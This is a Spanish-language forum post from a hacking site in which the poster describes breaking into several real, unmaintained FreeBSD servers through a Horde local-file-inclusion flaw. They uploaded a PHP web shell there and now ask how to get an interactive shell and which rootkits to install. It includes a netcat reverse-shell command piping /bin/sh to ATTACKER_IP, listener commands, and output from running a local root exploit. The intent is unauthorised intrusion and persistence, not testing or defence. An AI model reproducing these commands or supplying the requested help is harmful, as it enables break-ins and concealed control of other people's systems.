elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / Backdoor en FreeBSD en: 21 Febrero 2011, 09:03 am
Que tal!

En los ultimos dias he encontrado targets interesantes que sufren de esta vuln LFI: http://packetstormsecurity.org/files/view/98424/horde-lfi.txt

He logrado subir una shell PHP sencilla (passthru) y ejecutar comandos basicos bajo el usuario web (www).

Afortunadamente muchos de estos sistemas (todos FreeBSD) son raramente monitoreados y por lo tanto muchos no estan actualizados, por lo que tienen bastantes local root exploits que pueden ser ejecutados para posteriormente meterles un rootkit.

Desafortunadamente no he podido obtener una shell interactiva en el servidor, he intentado con el Netcat que trae el FreeBSD para hacer una Reverse Shell pero inmediatamente despues de ejecutar el comando me desconecta:



Victim:

Código:
nc ATTACKER_IP 1234 | /bin/sh | nc ATTACKER_IP 2345



Attacker 1:

Código:
echo "gcc exploit.c ; echo "Compilado" ; ./a.out ; id" | nc -lvvp 1234
Connection terminated ...



Attacker 2:

Código:
nc -lvvp 2345
Compilado
uid=80(www) gid=80(www) groups=80(www)
Connection terminated ...




Me imagino que el problema es con el netcat que trae el FreeBSD, mi consulta seria la siguiente:

1) Como puedo obtener una shell interactica? Compilando o subiendo un netcat propio?
2) Que rootkits recomiendan para FreeBSD?

De antemano gracias, saludos!
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines